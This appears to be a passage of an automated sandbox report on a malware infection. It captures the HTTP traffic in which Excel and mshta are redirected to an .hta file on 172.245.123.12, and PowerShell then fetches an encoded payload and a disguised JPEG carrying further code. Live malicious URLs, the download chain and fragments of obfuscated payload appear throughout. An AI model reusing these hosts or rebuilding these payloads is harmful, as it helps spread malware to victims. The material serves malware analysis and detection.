                                                            Data Ascii: mWAOkpukRoLZZBK = "KeNbiPOWLLLiaup"ULLxPAPZKLLmWhc = "NkQkkGLmUSGmGhx"jPWGqkWAUbNumcK = "NGmeajWUAKCnhbd"onOtsfKKk
                                                            Dec 2, 2024 07:29:03.465209007 CET1236INData Raw: 00 4c 00 4e 00 63 00 4b 00 6c 00 74 00 49 00 66 00 57 00 4c 00 5a 00 22 00 0d 00 0a 00 50 00 50 00 69 00 66 00 68 00 50 00 75 00 68 00 55 00 4b 00 63 00 6d 00 62 00 4b 00 54 00 20 00 3d 00 20 00 22 00 4e 00 4c 00 6c 00 4c 00 6b 00 4c 00 4b 00 4b
                                                            Data Ascii: LNcKltIfWLZ"PPifhPuhUKcmbKT = "NLlLkLKKCLGWZAW"LWLqhoUkoGcoliL = "eNWmzktbLCAhkzW"GoWNnlWzbhechNc = "LucoKRzcflAq
                                                            Dec 2, 2024 07:29:03.465223074 CET1236INData Raw: 00 74 00 57 00 55 00 65 00 4a 00 6c 00 76 00 20 00 3d 00 20 00 22 00 75 00 75 00 6d 00 47 00 7a 00 63 00 47 00 6c 00 67 00 49 00 54 00 55 00 6b 00 6a 00 41 00 22 00 0d 00 0a 00 62 00 57 00 78 00 4b 00 7a 00 54 00 78 00 6c 00 63 00 57 00 4b 00 57
                                                            Data Ascii: tWUeJlv = "uumGzcGlgITUkjA"bWxKzTxlcWKWBUA = "AAzWdfeiWlmbidk"iueKICRkmcvGbIi = "ZKOAkLcKKNKWiHm"LWokGHzugAdWkkL =
                                                            Dec 2, 2024 07:29:03.465234041 CET1236INData Raw: 00 6c 00 6b 00 55 00 57 00 22 00 0d 00 0a 00 6f 00 70 00 66 00 4c 00 68 00 65 00 4f 00 4c 00 6f 00 4b 00 6c 00 55 00 57 00 43 00 47 00 20 00 3d 00 20 00 22 00 66 00 52 00 78 00 6f 00 4c 00 7a 00 4e 00 75 00 50 00 78 00 4b 00 47 00 4c 00 54 00 43
                                                            Data Ascii: lkUW"opfLheOLoKlUWCG = "fRxoLzNuPxKGLTC"LKGWxLZeiicGPLl = "qcCUPglAlULqskk"uGcehAhnWCRxzKt = "fiqGKeuGqZChcWU"AjG
                                                            Dec 2, 2024 07:29:03.465246916 CET1236INData Raw: 00 20 00 22 00 61 00 6c 00 61 00 4c 00 41 00 57 00 4b 00 6e 00 6d 00 4b 00 55 00 7a 00 74 00 73 00 70 00 22 00 0d 00 0a 00 4b 00 7a 00 71 00 62 00 47 00 4c 00 4b 00 78 00 47 00 57 00 53 00 65 00 63 00 66 00 6b 00 20 00 3d 00 20 00 22 00 4b 00 50
                                                            Data Ascii: "alaLAWKnmKUztsp"KzqbGLKxGWSecfk = "KPAWhmPWGnRLcKW"dbNziBmcRKSLpqL = "rlmhNAcZciAfJRe"fzWAqvHZuKfIacR = "tblfcG
                                                            Dec 2, 2024 07:29:03.585176945 CET1236INData Raw: 00 55 00 53 00 65 00 47 00 69 00 61 00 57 00 6e 00 41 00 57 00 42 00 6f 00 69 00 20 00 3d 00 20 00 22 00 4a 00 6a 00 47 00 50 00 68 00 57 00 63 00 75 00 52 00 62 00 4b 00 4c 00 4e 00 74 00 55 00 22 00 0d 00 0a 00 4c 00 7a 00 70 00 6b 00 43 00 57
                                                            Data Ascii: USeGiaWnAWBoi = "JjGPhWcuRbKLNtU"LzpkCWifBfkLNpS = "SnpeWuiuTtKLLfP"zRzZuurLuGtLCAz = "ePriiqhOsNdbifp"WGBkrLLLkahi


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.2249169172.245.123.12804024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 2, 2024 07:29:25.585665941 CET79OUTGET /361/TELNERA.txt HTTP/1.1
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 07:29:26.746355057 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 14:29:26 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 01:42:13 GMT
                                                            ETag: "5d2ac-6283fa86a38cf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 381612
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/plain
                                                            Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                            Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            Dec 2, 2024 07:29:26.746371031 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw9o1WUZZwrem9Ihay0ZomQEtfwy8CpXHAOw2sfcYA8mF7RbMUVEugVfS+7voapW9MxR4X8xr36ofgq/vX2dC2uqwNbpBMTdELP34pvnqN9S3n4a6tklylFFe7k
                                                            Dec 2, 2024 07:29:26.746381998 CET1236INData Raw: 36 6b 68 33 53 52 59 2b 64 42 38 4f 42 4c 68 47 72 56 6d 73 72 6c 59 50 58 6d 71 36 4b 74 64 79 59 6c 63 68 57 70 53 49 43 69 4a 35 79 59 59 4d 52 75 67 6b 36 7a 76 6d 49 5a 56 2f 51 69 30 49 76 69 6d 66 66 65 31 58 63 47 6b 47 37 6f 76 63 2f 37
                                                            Data Ascii: 6kh3SRY+dB8OBLhGrVmsrlYPXmq6KtdyYlchWpSICiJ5yYYMRugk6zvmIZV/Qi0Ivimffe1XcGkG7ovc/7JJiaSbdzn8M9QwHcuDRs+CHjmsOSiB3OWlG17EFxw6KsRaOU93EQem/PgSWnRF5Kvcc5qOnhfzkgdW9fF2ar6X3/OzZ73AiVUEGpD9VXecdeiD1+yJTd7Em+xks+qxlWoZgCByKHE3msMoOSmriQOUXCy+43THXVj
                                                            Dec 2, 2024 07:29:26.746428013 CET1236INData Raw: 63 56 66 77 2f 55 4a 6a 31 44 6b 39 37 78 6d 72 33 47 30 68 48 47 4f 47 79 37 77 4b 6a 4c 6e 58 53 4f 4b 56 43 77 6c 70 2f 53 70 7a 45 4e 6e 76 75 7a 4e 36 2b 65 74 4b 45 68 56 45 30 71 6d 6c 42 6a 6f 76 45 52 4b 50 76 43 52 54 50 63 32 45 4b 73
                                                            Data Ascii: cVfw/UJj1Dk97xmr3G0hHGOGy7wKjLnXSOKVCwlp/SpzENnvuzN6+etKEhVE0qmlBjovERKPvCRTPc2EKsxHJRanrWjY9F3vSW9IsRg8GOrHuvYtLltkC27LBXVqgaHm6UZwJpnSiSrGuci4K29SOnnNDVAglyKrrrJ5ZKsjDT0Pc3y8esG6RVr0eweLvVkLen0EjBK9WbiiEfqHvC5nzqlUhNrZ0sPJjcqhP1UgqGbrRK5WD4F
                                                            Dec 2, 2024 07:29:26.746438026 CET1236INData Raw: 59 48 4e 6a 2b 6a 35 6a 73 61 6e 4a 31 68 53 46 31 35 52 51 79 77 77 75 57 5a 48 53 62 4f 42 35 4c 4c 42 6d 32 47 34 4d 67 77 4b 61 75 54 55 78 46 52 48 61 66 2b 37 2f 37 57 4f 53 62 6a 32 47 31 78 45 59 52 39 66 66 74 54 5a 4a 2f 76 75 56 33 5a
                                                            Data Ascii: YHNj+j5jsanJ1hSF15RQywwuWZHSbOB5LLBm2G4MgwKauTUxFRHaf+7/7WOSbj2G1xEYR9fftTZJ/vuV3ZsZ+mBouYSHGBgvN7R5LJh9alJHQBgMlxzP/eYyA3d+fxD7gE+XwwT7Y1DysQ2X3FCAi2XNISIvT3L3T2CXvqC4JxpYNKDs1FwsGrt8Gs3UHbmIPYWDnGOPcG+OFEYdUJ/blNcOq/jXpeij7a7Occ3cC4qpGLVvQYA
                                                            Dec 2, 2024 07:29:26.746448040 CET1236INData Raw: 39 47 41 65 49 77 30 6c 50 4d 33 61 52 65 6f 51 61 71 63 42 67 6e 70 6c 55 44 4c 37 47 6f 50 72 4d 72 42 52 62 58 71 56 45 6a 55 53 2f 50 68 47 4b 38 4c 72 51 36 44 63 50 32 42 7a 45 4b 66 50 42 54 4b 70 6d 6c 49 38 57 71 6a 6b 63 4d 69 34 62 53
                                                            Data Ascii: 9GAeIw0lPM3aReoQaqcBgnplUDL7GoPrMrBRbXqVEjUS/PhGK8LrQ6DcP2BzEKfPBTKpmlI8WqjkcMi4bStBFUgZ+H3vxg6oabxfieQjXzcLnjVerHQCKSZH1j3mQEepxxqITn2LhNGTV/iK7Nj4DtnKx3hnHdeW98ceyS3T7x8eZkLrz20m0omsnCdYuZm1aT/aUzv9595HoPuEmJNq0w9zj6IuTDCrOFNYtzAUzvjFjIf8coo
                                                            Dec 2, 2024 07:29:26.746458054 CET1236INData Raw: 4d 58 46 37 69 57 65 4f 69 75 5a 6a 37 44 69 6a 4e 61 32 4c 78 64 33 69 6e 50 45 46 34 2f 68 39 6a 63 6c 33 44 7a 78 44 61 78 59 6a 4f 74 38 47 4e 6b 34 57 79 39 52 6e 48 48 6e 4d 50 56 63 7a 74 4c 6d 4e 6e 78 59 46 7a 4b 79 6b 77 69 68 50 6f 73
                                                            Data Ascii: MXF7iWeOiuZj7DijNa2Lxd3inPEF4/h9jcl3DzxDaxYjOt8GNk4Wy9RnHHnMPVcztLmNnxYFzKykwihPos9H7UGBxUz+IbPNHuvmVTakt7c2LrgYDe4u+fC65BXEGSbhKCGRbW5VmffmuR47z/EGbXDA6axf44sQsMJvyaKrMhHMlSe3gf1uQdq7VKETVKvPo6LavZk6viQxi4FfCZmpGNqgobt7V47gWeudZxHCF1JY354bO9n
                                                            Dec 2, 2024 07:29:26.746685982 CET1236INData Raw: 61 49 41 61 72 79 6a 30 6b 64 6b 5a 79 45 31 2f 58 65 39 77 4c 6e 75 6f 63 30 6b 6e 68 43 30 58 62 30 79 2b 38 41 30 61 71 79 58 68 78 31 65 46 6e 41 77 54 54 64 47 57 52 79 52 72 75 43 2b 41 56 35 4e 62 63 51 79 75 59 6b 43 6d 2b 41 2b 77 74 73
                                                            Data Ascii: aIAaryj0kdkZyE1/Xe9wLnuoc0knhC0Xb0y+8A0aqyXhx1eFnAwTTdGWRyRruC+AV5NbcQyuYkCm+A+wtsueQcKIXauUpe/EeUX05p8nOJwc8RxIazF5tBnY9gWqR2tMn849RMYYmUvOWjrZ97jlL58QH4gW8Y1xHRP/yVrrMphMGZQbtpQNWoa2KZgUHECVhPb4i/qb4awu5jUZ+xqE5EMBjJhcfOXjTVGWMp1kqz6dKGEn6EI
                                                            Dec 2, 2024 07:29:26.746716976 CET1236INData Raw: 44 72 54 58 69 4d 2b 6f 58 32 67 56 67 75 71 4d 79 33 4d 54 4f 67 35 7a 7a 49 31 69 61 77 39 4b 44 67 6b 34 2b 4e 31 72 45 6f 4e 70 63 66 37 57 78 44 68 65 47 32 51 7a 6b 54 6d 49 68 62 2f 45 59 78 41 46 32 6d 55 6c 4a 53 65 67 76 32 6d 7a 54 4e
                                                            Data Ascii: DrTXiM+oX2gVguqMy3MTOg5zzI1iaw9KDgk4+N1rEoNpcf7WxDheG2QzkTmIhb/EYxAF2mUlJSegv2mzTNaZxdmA2/59M6luhH9PnNnDl+5Ck8IA7TPHQ/pzKNkA71NZ4aA0TAyXODOAhxfepfa4KRzkuUwDdg0n4zii8wi9B1j3jzDBrJlzQixPL+iZN58QvhkEIDchsS1sP3WK0b5E5wIRoW/C3zR0mX7GLUiWzsoxYtBKeEI
                                                            Dec 2, 2024 07:29:26.746726990 CET1236INData Raw: 4f 58 66 65 62 4b 6a 76 38 52 58 74 57 4a 31 30 4c 66 41 2b 52 4c 66 51 6e 74 68 68 68 64 42 45 48 34 41 6f 33 66 51 6e 71 36 2b 61 61 41 68 33 67 4f 6b 30 67 4e 36 6d 6b 45 72 6a 67 65 41 51 64 34 73 52 57 44 6a 75 59 62 35 55 77 5a 32 45 73 67
                                                            Data Ascii: OXfebKjv8RXtWJ10LfA+RLfQnthhhdBEH4Ao3fQnq6+aaAh3gOk0gN6mkErjgeAQd4sRWDjuYb5UwZ2EsgqvE8qskCrBhsLKGVxtQXdodsmKgGs0NF6NPNdqfZc5RdmPnhs9vIUojk1vUXdfhLZEHPcw2u5vZPOmzyD/NP828B5TxalC23ZWTcSTH5f5kXLxupFxnjsA+BDEd+SsT89PlS2o5vkcbXl9WmZh2IGofESBQQTPtan
                                                            Dec 2, 2024 07:29:26.866750002 CET1236INData Raw: 61 47 56 63 2f 4e 47 67 4b 49 4e 62 69 74 56 61 75 39 48 70 72 47 2f 61 38 64 74 77 67 54 48 73 6a 6d 41 6c 65 42 4a 62 6b 2f 31 77 58 4c 36 73 64 43 58 54 4a 4a 2f 6d 61 44 67 71 2b 2b 59 32 30 55 51 43 55 50 74 54 43 44 62 32 64 49 38 32 51 78
                                                            Data Ascii: aGVc/NGgKINbitVau9HprG/a8dtwgTHsjmAleBJbk/1wXL6sdCXTJJ/maDgq++Y20UQCUPtTCDb2dI82QxXhWUOfJOEWm0f3N6ISicuwjCe357QFHhai5uEIb+Hu9QLgN0dFMAQeIeMjfPZYtVMwhTLtb6FyvdEC8gVK3LnWnxd22V0FN7XNjfM+24aJOOq5fuChWWmaNujM9fgWB2PuENdIBKzsXECR6ocbq8gtmYmpd4Lk1LF


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249163188.114.97.64433280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-02 06:28:50 UTC404OUTGET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1
                                                            Accept: */*
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: linkjago.me
                                                            Connection: Keep-Alive
                                                            2024-12-02 06:28:51 UTC1203INHTTP/1.1 302 Found
                                                            Date: Mon, 02 Dec 2024 06:28:51 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 79
                                                            Connection: close
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: same-origin
                                                            x-dns-prefetch-control: off
                                                            x-frame-options: SAMEORIGIN
                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                            x-download-options: noopen
                                                            x-content-type-options: nosniff
                                                            origin-agent-cluster: ?1
                                                            x-permitted-cross-domain-policies: none
                                                            referrer-policy: no-referrer
                                                            x-xss-protection: 0
                                                            location: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta
                                                            vary: Accept, Accept-Encoding
                                                            x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                            Cache-Control: private
                                                            x-do-orig-status: 302
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0BPblwKpu7sJle%2BQO8z4JnleV1X04oTCfJL%2FodgdzKIe94lVzzwgJdLCgN58RE3i%2BEJolS7wsTO6ZvuBM3620Bfx6%2FHs0YNqBr1A9fi%2BjZZIAtlWCRo%2FW7cLOEYHaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8eb942564ee8433d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-02 06:28:51 UTC218INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 33 39 36 26 6d 69 6e 5f 72 74 74 3d 31 37 38 32 26 72 74 74 5f 76 61 72 3d 38 38 38 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 30 26 72 65 63 76 5f 62 79 74 65 73 3d 39 38 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 33 38 36 30 38 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 64 33 66 65 30 33 39 66 62 37 37 30 66 32 30 63 26 74 73 3d 31 32 32 35 26 78 3d 30 22 0d 0a 0d 0a
                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=15396&min_rtt=1782&rtt_var=8885&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2810&recv_bytes=986&delivery_rate=1638608&cwnd=252&unsent_bytes=0&cid=d3fe039fb770f20c&ts=1225&x=0"
                                                            2024-12-02 06:28:51 UTC79INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 32 2f 33 36 31 2f 73 65 6e 2f 73 65 65 6d 65 62 65 73 74 67 6f 6f 64 6c 75 63 6b 74 68 69 6e 67 73 2e 68 74 61
                                                            Data Ascii: Found. Redirecting to http://172.245.123.12/361/sen/seemebestgoodluckthings.hta


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.2249165188.114.97.64433600C:\Windows\System32\mshta.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-02 06:28:55 UTC428OUTGET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: fr-FR
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: linkjago.me
                                                            Connection: Keep-Alive
                                                            2024-12-02 06:28:55 UTC1197INHTTP/1.1 302 Found
                                                            Date: Mon, 02 Dec 2024 06:28:55 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 79
                                                            Connection: close
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: same-origin
                                                            x-dns-prefetch-control: off
                                                            x-frame-options: SAMEORIGIN
                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                            x-download-options: noopen
                                                            x-content-type-options: nosniff
                                                            origin-agent-cluster: ?1
                                                            x-permitted-cross-domain-policies: none
                                                            referrer-policy: no-referrer
                                                            x-xss-protection: 0
                                                            location: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta
                                                            vary: Accept, Accept-Encoding
                                                            x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                            Cache-Control: private
                                                            x-do-orig-status: 302
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V53369Mjg3cYKssaIGR5Ksqf%2BevPdVteoiAFq%2BZUC6ETOttbO6HKzjh3SciDJCOvzXACM0jQyO1w7cF6KEXNF5iUL7ZLITgFScIBnhoTIh9JmLFyZRUrwMOHO%2FAvlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8eb9427568d543ed-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-02 06:28:55 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 38 34 38 26 6d 69 6e 5f 72 74 74 3d 31 38 32 35 26 72 74 74 5f 76 61 72 3d 37 33 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 31 30 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 34 38 34 31 32 26 63 77 6e 64 3d 32 30 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 65 66 33 34 64 64 36 61 63 32 63 32 36 37 36 26 74 73 3d 37 34 39 26 78 3d 30 22 0d 0a 0d 0a
                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1825&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2810&recv_bytes=1010&delivery_rate=1448412&cwnd=205&unsent_bytes=0&cid=0ef34dd6ac2c2676&ts=749&x=0"
                                                            2024-12-02 06:28:55 UTC79INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 32 2f 33 36 31 2f 73 65 6e 2f 73 65 65 6d 65 62 65 73 74 67 6f 6f 64 6c 75 63 6b 74 68 69 6e 67 73 2e 68 74 61
                                                            Data Ascii: Found. Redirecting to http://172.245.123.12/361/sen/seemebestgoodluckthings.hta


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.2249168142.215.209.774434024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-02 06:29:10 UTC198OUTGET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                            Host: 1016.filemail.com
                                                            Connection: Keep-Alive
                                                            2024-12-02 06:29:11 UTC328INHTTP/1.1 200 OK
                                                            Content-Length: 2230233
                                                            Content-Type: image/jpeg
                                                            Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: 1c84779d9886011235a5e11f64ee8efb
                                                            X-Transfer-ID: qxdlxyadbikkvgc
                                                            Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                            Date: Mon, 02 Dec 2024 06:29:10 GMT
                                                            Connection: close
                                                            2024-12-02 06:29:11 UTC2469INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                            2024-12-02 06:29:11 UTC8192INData Raw: d5 9b 71 07 9c f9 37 ec fb c3 5b 47 f6 ef c2 df cd 05 57 cd b0 7f fc 93 e7 da 75 3a 78 13 52 f2 85 5f 32 50 0d 86 ea 30 30 75 3e 21 a6 d0 c2 da 99 de 96 25 dd 67 8c f2 90 6a 5f ed df 8e 09 59 d9 74 1a 56 52 aa 2c 06 20 df 5c f4 5e 33 e0 b1 78 9c 2d a7 9d 59 62 3e d8 3f b3 fe 0b 07 80 68 46 9a 01 60 b1 6d c4 73 80 8f d9 f6 30 7e d5 7e d2 18 d4 22 2e 96 11 43 a8 1b 12 b3 37 c4 de 6d 57 db 19 34 ef fb a8 e4 f1 66 67 70 d4 db be e8 a1 7e 34 c3 71 cb f8 33 b7 ff 00 75 6f 1f 9d 1a 80 d3 22 15 3d f8 8f 9f a6 d3 8b eb 75 25 3e dc 47 1b 10 37 f8 ae fd ec 3d 5f fd 8a 82 af a5 7a b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31 ef b0 9f 66 e5 56 3e 29 ad 2e b3 ee 23 6b 5d 91 ef 8f 7d b6 3b 7e d3 fd 99 2c a0 de a4 02 48 e8 3c c8 b9 fd 2b
                                                            Data Ascii: q7[GWu:xR_2P00u>!%gj_YtVR, \^3x-Yb>?hF`ms0~~".C7mW4fgp~4q3uo"=u%>G7=_z0bxxZx|{e1fV>).#k]};~,H<+
